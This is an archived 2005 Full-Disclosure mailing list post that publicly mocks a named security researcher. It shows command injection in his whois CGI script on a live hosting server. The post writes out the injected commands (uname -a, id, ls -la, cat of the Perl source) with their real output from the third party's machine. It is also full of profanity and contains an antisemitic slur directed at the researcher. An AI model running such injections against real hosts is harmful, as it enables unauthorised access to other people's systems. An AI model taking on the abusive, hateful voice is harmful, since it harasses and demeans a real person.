[Full-disclosure] Fernando Gont remote command execution and big mouth vulnerability

Wed, 03 Aug 2005 19:02:21 -0700 

SHUT THE FUCK UP!!! AND FIX YOUR FUCKING WEBSITE!!!  WE ARE ALL SICK
OF YOUR BORING E-MAILS!!!! MOTHERFUCKER!


http://thor.prohosting.com/fgont/cgi-bin/whois.pl

whois for domain: uname -a

FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3
#0: Fri Nov  5 10:49:09 MST 2004    
[EMAIL PROTECTED]:/usr/obj/usr/src/sys/LOCAL  i386


and whois for domain: id


uid=59286(u0638237) gid=1000(user) groups=1000(user)


and for ls -la

   whois ls -la
total 124
dr-xr-xr-x  2 u0638237  2000    512 Dec 28  2003 .
drwxr-xr-x  6 u0638237  2000    512 Jul 21 04:35 ..
-rwxr-xr-x  1 u0638237  2000  15091 Jul 30  2003 cgi-lib.pl
-rwxr-xr-x  1 u0638237  2000    621 Jun 24  2003 cli.pl
-rwxr-xr-x  1 u0638237  2000    993 Jul 30  2003 dig.pl
-rwxr-xr-x  1 u0638237  2000   4388 Dec 28  2003 fuente.cgi
-r--r--r--  1 u0638237  2000    552 Jun 25  2003 p1.txt
-r--r--r--  1 u0638237  2000    549 Jul  7  2003 p1dig.txt
-r--r--r--  1 u0638237  2000    556 Jul  7  2003 p1host.txt
-r--r--r--  1 u0638237  2000    577 Jul  7  2003 p1ns.txt
-r-xr-xr-x  1 u0638237  2000    562 Dec 28  2003 p1whois.txt
-r--r--r--  1 u0638237  2000    192 Jun 25  2003 p2.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2dig.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2host.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2ns.txt
-rwxrwxrwx  1 u0638237  2000    192 Dec 27  2003 p2whois.txt
-rwxr-xr-x  1 u0638237  2000  10171 Dec 28  2003 whois.cgi
-rwxr-xr-x  1 u0638237  2000    842 Dec 28  2003 whois.pl


BREAKING NEWS... for registrants of domain cat whois.pl

   whois cat whois.pl
#!/usr/local/bin/perl

        require('cgi-lib.pl');
        &ReadParse;

        $p1="p1whois.txt";
        $p2="p2whois.txt";

        print "Content-type: text/html\r\n\r\n";
        $string = $in{'direccion'};

        $_ = $string;
        $string=~ s/\>//g;
.....

$cmd ----->> YOU FUCKING JEW!!!!!!!!!!!

   "; open(p2); while($linea=){ print "$linea"; } close(p2);


Turkey hunters, inc

  "knock, knock, Neo follow the white turkey!!" 

"Fernando Gont" <[EMAIL PROTECTED]>
> Folks,
> 
> My posts to this list have tried to show how easy it is to perform ICMP 
> attacks against TCP.
> 
> The attacks are blind, so the attacker does not need to be a "man in the 
> middle" to perform then. The typical number of packets required to perform 
> any of these attacks is about 16000 (in many cases, the attacker requires 
> fewer packets). This means that even when a 128kbps link, it will take the 
> attacker much less than a minute to perform them.
.....

> Fernando Gont
> e-mail: [EMAIL PROTECTED] || [EMAIL PROTECTED]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to